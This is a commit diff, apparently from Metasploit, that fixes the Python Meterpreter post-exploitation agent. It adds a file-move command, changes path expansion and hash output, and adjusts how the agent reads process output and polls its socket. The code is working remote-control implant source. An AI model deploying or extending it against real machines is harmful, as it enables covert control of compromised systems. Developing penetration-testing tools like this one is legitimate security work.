Fix additional issues in the python meterpreter.

2013-09-10 15:06:33 -04:00 · 2013-09-10 15:06:33 -04:00 · e3e2c69de1
parent c40b68f252
commit e3e2c69de1
2 changed files with 26 additions and 13 deletions
--- a/data/meterpreter/ext_server_stdapi.py
+++ b/data/meterpreter/ext_server_stdapi.py
@ -580,20 +580,28 @@ def stdapi_fs_delete_file(request, response):
@meterpreter.register_function
 def stdapi_fs_file_expand_path(request, response):
 	path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
-	if path_tlv == '%COMSPEC%':
-		if platform.system() == 'Windows':
-			result = 'cmd.exe'
-		else:
-			result = '/bin/sh'
-	elif path_tlv in ['%TEMP%', '%TMP%'] and platform.system() != 'Windows':
+	if has_windll:
+		path_out = (ctypes.c_char * 4096)()
+		path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(path_tlv, ctypes.byref(path_out), ctypes.sizeof(path_out))
+		result = ''.join(path_out)[:path_out_len]
+	elif path_tlv == '%COMSPEC%':
+		result = '/bin/sh'
+	elif path_tlv in ['%TEMP%', '%TMP%']:
 		result = '/tmp'
 	else:
-		result = os.getenv(path_tlv)
+		result = os.getenv(path_tlv, path_tlv)
 	if not result:
 		return ERROR_FAILURE, response
 	response += tlv_pack(TLV_TYPE_FILE_PATH, result)
 	return ERROR_SUCCESS, response

+@meterpreter.register_function
+def stdapi_fs_file_move(request, response):
+	oldname = packet_get_tlv(request, TLV_TYPE_FILE_NAME)['value']
+	newname = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
+	os.rename(oldname, newname)
+	return ERROR_SUCCESS, response
+
@meterpreter.register_function
 def stdapi_fs_getwd(request, response):
 	response += tlv_pack(TLV_TYPE_DIRECTORY_PATH, os.getcwd())
@ -622,7 +630,7 @@ def stdapi_fs_md5(request, response):
 		m = hashlib.md5()
 	path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
 	m.update(open(path, 'rb').read())
-	response += tlv_pack(TLV_TYPE_FILE_NAME, m.hexdigest())
+	response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
 	return ERROR_SUCCESS, response

@meterpreter.register_function
@ -669,7 +677,7 @@ def stdapi_fs_sha1(request, response):
 		m = hashlib.sha1()
 	path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
 	m.update(open(path, 'rb').read())
-	response += tlv_pack(TLV_TYPE_FILE_NAME, m.hexdigest())
+	response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
 	return ERROR_SUCCESS, response

@meterpreter.register_function
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@ -145,8 +145,9 @@ class STDProcessBuffer(threading.Thread):
 			self.data_lock.acquire()
 			self.data += byte
 			self.data_lock.release()
+		data = self.std.read()
 		self.data_lock.acquire()
-		self.data += self.std.read()
+		self.data += data
 		self.data_lock.release()

 	def is_read_ready(self):
@ -208,7 +209,7 @@ class PythonMeterpreter(object):

 	def run(self):
 		while self.running:
-			if len(select.select([self.socket], [], [], 0)[0]):
+			if len(select.select([self.socket], [], [], 0.5)[0]):
 				request = self.socket.recv(8)
 				if len(request) != 8:
 					break
@ -391,13 +392,17 @@ class PythonMeterpreter(object):
 		reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID)
 		resp += tlv_pack(reqid_tlv)

-		if method_tlv['value'] in self.extension_functions:
-			handler = self.extension_functions[method_tlv['value']]
+		handler_name = method_tlv['value']
+		if handler_name in self.extension_functions:
+			handler = self.extension_functions[handler_name]
 			try:
+				#print("[*] running method {0}".format(handler_name))
 				result, resp = handler(request, resp)
 			except Exception, err:
+				#print("[-] method {0} resulted in an error".format(handler_name))
 				result = ERROR_FAILURE
 		else:
+			#print("[-] method {0} was requested but does not exist".format(handler_name))
 			result = ERROR_FAILURE
 		resp += tlv_pack(TLV_TYPE_RESULT, result)
 		resp = struct.pack('>I', len(resp) + 4) + resp